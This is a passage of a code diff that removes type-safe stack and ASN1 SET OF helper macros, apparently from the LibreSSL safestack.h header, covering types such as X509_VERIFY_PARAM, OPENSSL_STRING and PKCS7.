-#define sk_X509_VERIFY_PARAM_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_VERIFY_PARAM, (st), (cmp))
-#define sk_X509_VERIFY_PARAM_dup(st) SKM_sk_dup(X509_VERIFY_PARAM, st)
-#define sk_X509_VERIFY_PARAM_pop_free(st, free_func) SKM_sk_pop_free(X509_VERIFY_PARAM, (st), (free_func))
-#define sk_X509_VERIFY_PARAM_shift(st) SKM_sk_shift(X509_VERIFY_PARAM, (st))
-#define sk_X509_VERIFY_PARAM_pop(st) SKM_sk_pop(X509_VERIFY_PARAM, (st))
-#define sk_X509_VERIFY_PARAM_sort(st) SKM_sk_sort(X509_VERIFY_PARAM, (st))
-#define sk_X509_VERIFY_PARAM_is_sorted(st) SKM_sk_is_sorted(X509_VERIFY_PARAM, (st))
-
-#define sk_nid_triple_new(cmp) SKM_sk_new(nid_triple, (cmp))
-#define sk_nid_triple_new_null() SKM_sk_new_null(nid_triple)
-#define sk_nid_triple_free(st) SKM_sk_free(nid_triple, (st))
-#define sk_nid_triple_num(st) SKM_sk_num(nid_triple, (st))
-#define sk_nid_triple_value(st, i) SKM_sk_value(nid_triple, (st), (i))
-#define sk_nid_triple_set(st, i, val) SKM_sk_set(nid_triple, (st), (i), (val))
-#define sk_nid_triple_zero(st) SKM_sk_zero(nid_triple, (st))
-#define sk_nid_triple_push(st, val) SKM_sk_push(nid_triple, (st), (val))
-#define sk_nid_triple_unshift(st, val) SKM_sk_unshift(nid_triple, (st), (val))
-#define sk_nid_triple_find(st, val) SKM_sk_find(nid_triple, (st), (val))
-#define sk_nid_triple_find_ex(st, val) SKM_sk_find_ex(nid_triple, (st), (val))
-#define sk_nid_triple_delete(st, i) SKM_sk_delete(nid_triple, (st), (i))
-#define sk_nid_triple_delete_ptr(st, ptr) SKM_sk_delete_ptr(nid_triple, (st), (ptr))
-#define sk_nid_triple_insert(st, val, i) SKM_sk_insert(nid_triple, (st), (val), (i))
-#define sk_nid_triple_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(nid_triple, (st), (cmp))
-#define sk_nid_triple_dup(st) SKM_sk_dup(nid_triple, st)
-#define sk_nid_triple_pop_free(st, free_func) SKM_sk_pop_free(nid_triple, (st), (free_func))
-#define sk_nid_triple_shift(st) SKM_sk_shift(nid_triple, (st))
-#define sk_nid_triple_pop(st) SKM_sk_pop(nid_triple, (st))
-#define sk_nid_triple_sort(st) SKM_sk_sort(nid_triple, (st))
-#define sk_nid_triple_is_sorted(st) SKM_sk_is_sorted(nid_triple, (st))
-
-#define sk_void_new(cmp) SKM_sk_new(void, (cmp))
-#define sk_void_new_null() SKM_sk_new_null(void)
-#define sk_void_free(st) SKM_sk_free(void, (st))
-#define sk_void_num(st) SKM_sk_num(void, (st))
-#define sk_void_value(st, i) SKM_sk_value(void, (st), (i))
-#define sk_void_set(st, i, val) SKM_sk_set(void, (st), (i), (val))
-#define sk_void_zero(st) SKM_sk_zero(void, (st))
-#define sk_void_push(st, val) SKM_sk_push(void, (st), (val))
-#define sk_void_unshift(st, val) SKM_sk_unshift(void, (st), (val))
-#define sk_void_find(st, val) SKM_sk_find(void, (st), (val))
-#define sk_void_find_ex(st, val) SKM_sk_find_ex(void, (st), (val))
-#define sk_void_delete(st, i) SKM_sk_delete(void, (st), (i))
-#define sk_void_delete_ptr(st, ptr) SKM_sk_delete_ptr(void, (st), (ptr))
-#define sk_void_insert(st, val, i) SKM_sk_insert(void, (st), (val), (i))
-#define sk_void_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(void, (st), (cmp))
-#define sk_void_dup(st) SKM_sk_dup(void, st)
-#define sk_void_pop_free(st, free_func) SKM_sk_pop_free(void, (st), (free_func))
-#define sk_void_shift(st) SKM_sk_shift(void, (st))
-#define sk_void_pop(st) SKM_sk_pop(void, (st))
-#define sk_void_sort(st) SKM_sk_sort(void, (st))
-#define sk_void_is_sorted(st) SKM_sk_is_sorted(void, (st))
-
-#define sk_OPENSSL_STRING_new(cmp) ((STACK_OF(OPENSSL_STRING) *)sk_new(CHECKED_SK_CMP_FUNC(char, cmp)))
-#define sk_OPENSSL_STRING_new_null() ((STACK_OF(OPENSSL_STRING) *)sk_new_null())
-#define sk_OPENSSL_STRING_push(st, val) sk_push(CHECKED_STACK_OF(OPENSSL_STRING, st), CHECKED_PTR_OF(char, val))
-#define sk_OPENSSL_STRING_find(st, val) sk_find(CHECKED_STACK_OF(OPENSSL_STRING, st), CHECKED_PTR_OF(char, val))
-#define sk_OPENSSL_STRING_value(st, i) ((OPENSSL_STRING)sk_value(CHECKED_STACK_OF(OPENSSL_STRING, st), i))
-#define sk_OPENSSL_STRING_num(st) SKM_sk_num(OPENSSL_STRING, st)
-#define sk_OPENSSL_STRING_pop_free(st, free_func) sk_pop_free(CHECKED_STACK_OF(OPENSSL_STRING, st), CHECKED_SK_FREE_FUNC2(OPENSSL_STRING, free_func))
-#define sk_OPENSSL_STRING_insert(st, val, i) sk_insert(CHECKED_STACK_OF(OPENSSL_STRING, st), CHECKED_PTR_OF(char, val), i)
-#define sk_OPENSSL_STRING_free(st) SKM_sk_free(OPENSSL_STRING, st)
-#define sk_OPENSSL_STRING_set(st, i, val) sk_set(CHECKED_STACK_OF(OPENSSL_STRING, st), i, CHECKED_PTR_OF(char, val))
-#define sk_OPENSSL_STRING_zero(st) SKM_sk_zero(OPENSSL_STRING, (st))
-#define sk_OPENSSL_STRING_unshift(st, val) sk_unshift(CHECKED_STACK_OF(OPENSSL_STRING, st), CHECKED_PTR_OF(char, val))
-#define sk_OPENSSL_STRING_find_ex(st, val) sk_find_ex((_STACK *)CHECKED_CONST_PTR_OF(STACK_OF(OPENSSL_STRING), st), CHECKED_CONST_PTR_OF(char, val))
-#define sk_OPENSSL_STRING_delete(st, i) SKM_sk_delete(OPENSSL_STRING, (st), (i))
-#define sk_OPENSSL_STRING_delete_ptr(st, ptr) (OPENSSL_STRING *)sk_delete_ptr(CHECKED_STACK_OF(OPENSSL_STRING, st), CHECKED_PTR_OF(char, ptr))
-#define sk_OPENSSL_STRING_set_cmp_func(st, cmp)  \
-	((int (*)(const char * const *,const char * const *)) \
-	sk_set_cmp_func(CHECKED_STACK_OF(OPENSSL_STRING, st), CHECKED_SK_CMP_FUNC(char, cmp)))
-#define sk_OPENSSL_STRING_dup(st) SKM_sk_dup(OPENSSL_STRING, st)
-#define sk_OPENSSL_STRING_shift(st) SKM_sk_shift(OPENSSL_STRING, (st))
-#define sk_OPENSSL_STRING_pop(st) (char *)sk_pop(CHECKED_STACK_OF(OPENSSL_STRING, st))
-#define sk_OPENSSL_STRING_sort(st) SKM_sk_sort(OPENSSL_STRING, (st))
-#define sk_OPENSSL_STRING_is_sorted(st) SKM_sk_is_sorted(OPENSSL_STRING, (st))
-
-
-#define sk_OPENSSL_BLOCK_new(cmp) ((STACK_OF(OPENSSL_BLOCK) *)sk_new(CHECKED_SK_CMP_FUNC(void, cmp)))
-#define sk_OPENSSL_BLOCK_new_null() ((STACK_OF(OPENSSL_BLOCK) *)sk_new_null())
-#define sk_OPENSSL_BLOCK_push(st, val) sk_push(CHECKED_STACK_OF(OPENSSL_BLOCK, st), CHECKED_PTR_OF(void, val))
-#define sk_OPENSSL_BLOCK_find(st, val) sk_find(CHECKED_STACK_OF(OPENSSL_BLOCK, st), CHECKED_PTR_OF(void, val))
-#define sk_OPENSSL_BLOCK_value(st, i) ((OPENSSL_BLOCK)sk_value(CHECKED_STACK_OF(OPENSSL_BLOCK, st), i))
-#define sk_OPENSSL_BLOCK_num(st) SKM_sk_num(OPENSSL_BLOCK, st)
-#define sk_OPENSSL_BLOCK_pop_free(st, free_func) sk_pop_free(CHECKED_STACK_OF(OPENSSL_BLOCK, st), CHECKED_SK_FREE_FUNC2(OPENSSL_BLOCK, free_func))
-#define sk_OPENSSL_BLOCK_insert(st, val, i) sk_insert(CHECKED_STACK_OF(OPENSSL_BLOCK, st), CHECKED_PTR_OF(void, val), i)
-#define sk_OPENSSL_BLOCK_free(st) SKM_sk_free(OPENSSL_BLOCK, st)
-#define sk_OPENSSL_BLOCK_set(st, i, val) sk_set(CHECKED_STACK_OF(OPENSSL_BLOCK, st), i, CHECKED_PTR_OF(void, val))
-#define sk_OPENSSL_BLOCK_zero(st) SKM_sk_zero(OPENSSL_BLOCK, (st))
-#define sk_OPENSSL_BLOCK_unshift(st, val) sk_unshift(CHECKED_STACK_OF(OPENSSL_BLOCK, st), CHECKED_PTR_OF(void, val))
-#define sk_OPENSSL_BLOCK_find_ex(st, val) sk_find_ex((_STACK *)CHECKED_CONST_PTR_OF(STACK_OF(OPENSSL_BLOCK), st), CHECKED_CONST_PTR_OF(void, val))
-#define sk_OPENSSL_BLOCK_delete(st, i) SKM_sk_delete(OPENSSL_BLOCK, (st), (i))
-#define sk_OPENSSL_BLOCK_delete_ptr(st, ptr) (OPENSSL_BLOCK *)sk_delete_ptr(CHECKED_STACK_OF(OPENSSL_BLOCK, st), CHECKED_PTR_OF(void, ptr))
-#define sk_OPENSSL_BLOCK_set_cmp_func(st, cmp)  \
-	((int (*)(const void * const *,const void * const *)) \
-	sk_set_cmp_func(CHECKED_STACK_OF(OPENSSL_BLOCK, st), CHECKED_SK_CMP_FUNC(void, cmp)))
-#define sk_OPENSSL_BLOCK_dup(st) SKM_sk_dup(OPENSSL_BLOCK, st)
-#define sk_OPENSSL_BLOCK_shift(st) SKM_sk_shift(OPENSSL_BLOCK, (st))
-#define sk_OPENSSL_BLOCK_pop(st) (void *)sk_pop(CHECKED_STACK_OF(OPENSSL_BLOCK, st))
-#define sk_OPENSSL_BLOCK_sort(st) SKM_sk_sort(OPENSSL_BLOCK, (st))
-#define sk_OPENSSL_BLOCK_is_sorted(st) SKM_sk_is_sorted(OPENSSL_BLOCK, (st))
-
-
-#define sk_OPENSSL_PSTRING_new(cmp) ((STACK_OF(OPENSSL_PSTRING) *)sk_new(CHECKED_SK_CMP_FUNC(OPENSSL_STRING, cmp)))
-#define sk_OPENSSL_PSTRING_new_null() ((STACK_OF(OPENSSL_PSTRING) *)sk_new_null())
-#define sk_OPENSSL_PSTRING_push(st, val) sk_push(CHECKED_STACK_OF(OPENSSL_PSTRING, st), CHECKED_PTR_OF(OPENSSL_STRING, val))
-#define sk_OPENSSL_PSTRING_find(st, val) sk_find(CHECKED_STACK_OF(OPENSSL_PSTRING, st), CHECKED_PTR_OF(OPENSSL_STRING, val))
-#define sk_OPENSSL_PSTRING_value(st, i) ((OPENSSL_PSTRING)sk_value(CHECKED_STACK_OF(OPENSSL_PSTRING, st), i))
-#define sk_OPENSSL_PSTRING_num(st) SKM_sk_num(OPENSSL_PSTRING, st)
-#define sk_OPENSSL_PSTRING_pop_free(st, free_func) sk_pop_free(CHECKED_STACK_OF(OPENSSL_PSTRING, st), CHECKED_SK_FREE_FUNC2(OPENSSL_PSTRING, free_func))
-#define sk_OPENSSL_PSTRING_insert(st, val, i) sk_insert(CHECKED_STACK_OF(OPENSSL_PSTRING, st), CHECKED_PTR_OF(OPENSSL_STRING, val), i)
-#define sk_OPENSSL_PSTRING_free(st) SKM_sk_free(OPENSSL_PSTRING, st)
-#define sk_OPENSSL_PSTRING_set(st, i, val) sk_set(CHECKED_STACK_OF(OPENSSL_PSTRING, st), i, CHECKED_PTR_OF(OPENSSL_STRING, val))
-#define sk_OPENSSL_PSTRING_zero(st) SKM_sk_zero(OPENSSL_PSTRING, (st))
-#define sk_OPENSSL_PSTRING_unshift(st, val) sk_unshift(CHECKED_STACK_OF(OPENSSL_PSTRING, st), CHECKED_PTR_OF(OPENSSL_STRING, val))
-#define sk_OPENSSL_PSTRING_find_ex(st, val) sk_find_ex((_STACK *)CHECKED_CONST_PTR_OF(STACK_OF(OPENSSL_PSTRING), st), CHECKED_CONST_PTR_OF(OPENSSL_STRING, val))
-#define sk_OPENSSL_PSTRING_delete(st, i) SKM_sk_delete(OPENSSL_PSTRING, (st), (i))
-#define sk_OPENSSL_PSTRING_delete_ptr(st, ptr) (OPENSSL_PSTRING *)sk_delete_ptr(CHECKED_STACK_OF(OPENSSL_PSTRING, st), CHECKED_PTR_OF(OPENSSL_STRING, ptr))
-#define sk_OPENSSL_PSTRING_set_cmp_func(st, cmp)  \
-	((int (*)(const OPENSSL_STRING * const *,const OPENSSL_STRING * const *)) \
-	sk_set_cmp_func(CHECKED_STACK_OF(OPENSSL_PSTRING, st), CHECKED_SK_CMP_FUNC(OPENSSL_STRING, cmp)))
-#define sk_OPENSSL_PSTRING_dup(st) SKM_sk_dup(OPENSSL_PSTRING, st)
-#define sk_OPENSSL_PSTRING_shift(st) SKM_sk_shift(OPENSSL_PSTRING, (st))
-#define sk_OPENSSL_PSTRING_pop(st) (OPENSSL_STRING *)sk_pop(CHECKED_STACK_OF(OPENSSL_PSTRING, st))
-#define sk_OPENSSL_PSTRING_sort(st) SKM_sk_sort(OPENSSL_PSTRING, (st))
-#define sk_OPENSSL_PSTRING_is_sorted(st) SKM_sk_is_sorted(OPENSSL_PSTRING, (st))
-
-#ifndef LIBRESSL_INTERNAL
-#define d2i_ASN1_SET_OF_ACCESS_DESCRIPTION(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(ACCESS_DESCRIPTION, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_ACCESS_DESCRIPTION(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(ACCESS_DESCRIPTION, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_ACCESS_DESCRIPTION(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(ACCESS_DESCRIPTION, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_ACCESS_DESCRIPTION(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(ACCESS_DESCRIPTION, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_ASN1_INTEGER(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(ASN1_INTEGER, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_ASN1_INTEGER(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(ASN1_INTEGER, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_ASN1_INTEGER(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(ASN1_INTEGER, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_ASN1_INTEGER(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(ASN1_INTEGER, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_ASN1_OBJECT(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(ASN1_OBJECT, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_ASN1_OBJECT(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(ASN1_OBJECT, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_ASN1_OBJECT(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(ASN1_OBJECT, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_ASN1_OBJECT(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(ASN1_OBJECT, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_ASN1_TYPE(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(ASN1_TYPE, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_ASN1_TYPE(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(ASN1_TYPE, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_ASN1_TYPE(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(ASN1_TYPE, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_ASN1_TYPE(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(ASN1_TYPE, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_ASN1_UTF8STRING(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(ASN1_UTF8STRING, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_ASN1_UTF8STRING(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(ASN1_UTF8STRING, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_ASN1_UTF8STRING(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(ASN1_UTF8STRING, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_ASN1_UTF8STRING(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(ASN1_UTF8STRING, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_DIST_POINT(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(DIST_POINT, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_DIST_POINT(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(DIST_POINT, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_DIST_POINT(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(DIST_POINT, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_DIST_POINT(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(DIST_POINT, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_ESS_CERT_ID(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(ESS_CERT_ID, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_ESS_CERT_ID(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(ESS_CERT_ID, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_ESS_CERT_ID(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(ESS_CERT_ID, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_ESS_CERT_ID(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(ESS_CERT_ID, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_EVP_MD(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(EVP_MD, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_EVP_MD(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(EVP_MD, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_EVP_MD(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(EVP_MD, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_EVP_MD(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(EVP_MD, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_GENERAL_NAME(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(GENERAL_NAME, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_GENERAL_NAME(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(GENERAL_NAME, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_GENERAL_NAME(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(GENERAL_NAME, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_GENERAL_NAME(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(GENERAL_NAME, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_OCSP_ONEREQ(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(OCSP_ONEREQ, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_OCSP_ONEREQ(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(OCSP_ONEREQ, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_OCSP_ONEREQ(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(OCSP_ONEREQ, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_OCSP_ONEREQ(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(OCSP_ONEREQ, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_OCSP_SINGLERESP(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(OCSP_SINGLERESP, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_OCSP_SINGLERESP(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(OCSP_SINGLERESP, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_OCSP_SINGLERESP(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(OCSP_SINGLERESP, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_OCSP_SINGLERESP(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(OCSP_SINGLERESP, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_PKCS12_SAFEBAG(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(PKCS12_SAFEBAG, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_PKCS12_SAFEBAG(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(PKCS12_SAFEBAG, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_PKCS12_SAFEBAG(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(PKCS12_SAFEBAG, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_PKCS12_SAFEBAG(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(PKCS12_SAFEBAG, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_PKCS7(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(PKCS7, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_PKCS7(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(PKCS7, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_PKCS7(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(PKCS7, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_PKCS7(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(PKCS7, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_PKCS7_RECIP_INFO(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(PKCS7_RECIP_INFO, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_PKCS7_RECIP_INFO(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(PKCS7_RECIP_INFO, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_PKCS7_RECIP_INFO(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(PKCS7_RECIP_INFO, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_PKCS7_RECIP_INFO(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(PKCS7_RECIP_INFO, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_PKCS7_SIGNER_INFO(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(PKCS7_SIGNER_INFO, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_PKCS7_SIGNER_INFO(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(PKCS7_SIGNER_INFO, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_PKCS7_SIGNER_INFO(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(PKCS7_SIGNER_INFO, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_PKCS7_SIGNER_INFO(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(PKCS7_SIGNER_INFO, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_POLICYINFO(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(POLICYINFO, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_POLICYINFO(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(POLICYINFO, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_POLICYINFO(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(POLICYINFO, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_POLICYINFO(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(POLICYINFO, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_POLICYQUALINFO(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(POLICYQUALINFO, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_POLICYQUALINFO(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(POLICYQUALINFO, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_POLICYQUALINFO(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(POLICYQUALINFO, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_POLICYQUALINFO(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(POLICYQUALINFO, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_SXNETID(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(SXNETID, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_SXNETID(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(SXNETID, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_SXNETID(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(SXNETID, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_SXNETID(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(SXNETID, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_X509(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(X509, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_X509(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(X509, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_X509(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(X509, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_X509(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(X509, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_X509_ALGOR(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(X509_ALGOR, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_X509_ALGOR(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(X509_ALGOR, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_X509_ALGOR(st, i2d_func, buf, len) \
